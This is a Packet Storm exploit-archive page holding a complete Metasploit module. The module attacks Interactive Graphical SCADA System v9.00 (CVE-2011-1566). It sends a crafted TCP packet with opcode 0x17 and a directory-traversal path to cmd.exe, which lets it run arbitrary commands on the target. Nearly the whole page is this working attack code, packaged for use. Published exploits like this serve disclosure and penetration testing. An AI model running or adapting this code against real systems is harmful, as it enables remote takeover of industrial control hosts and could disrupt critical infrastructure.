Lucene search

K
packetstormLuigi AuriemmaPACKETSTORM:123709
HistoryOct 22, 2013 - 12:00 a.m.

Interactive Graphical SCADA System Remote Command Injection

2013-10-2200:00:00
Luigi Auriemma
packetstormsecurity.com
19

0.883 High

EPSS

Percentile

98.7%

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Interactive Graphical SCADA System Remote Command Injection',  
'Description' => %q{  
This module abuses a directory traversal flaw in Interactive  
Graphical SCADA System v9.00. In conjunction with the traversal  
flaw, if opcode 0x17 is sent to the dc.exe process, an attacker  
may be able to execute arbitrary system commands.  
},  
'Author' =>  
[  
'Luigi Auriemma',  
'MC'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2011-1566'],  
[ 'OSVDB', '72349'],  
[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],  
],  
'Platform' => 'win',  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Space' => 153,  
'DisableNops' => true  
},  
'Targets' =>  
[  
[ 'Windows', {} ]  
],  
'DefaultTarget' => 0,  
'Privileged' => false,  
'DisclosureDate' => 'Mar 21 2011'))  
  
register_options(  
[  
Opt::RPORT(12397)  
], self.class)  
end  
  
def exploit  
  
print_status("Sending exploit packet...")  
  
connect  
  
packet = [0x00000100].pack('V') + [0x00000000].pack('V')  
packet << [0x00000100].pack('V') + [0x00000017].pack('V')  
packet << [0x00000000].pack('V') + [0x00000000].pack('V')  
packet << [0x00000000].pack('V') + [0x00000000].pack('V')  
packet << [0x00000000].pack('V') + [0x00000000].pack('V')  
packet << [0x00000000].pack('V')  
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"  
packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"  
packet << "\x00" * (143) #  
  
sock.put(packet)  
sock.get_once(-1,0.5)  
disconnect  
  
end  
  
end  
`

0.883 High

EPSS

Percentile

98.7%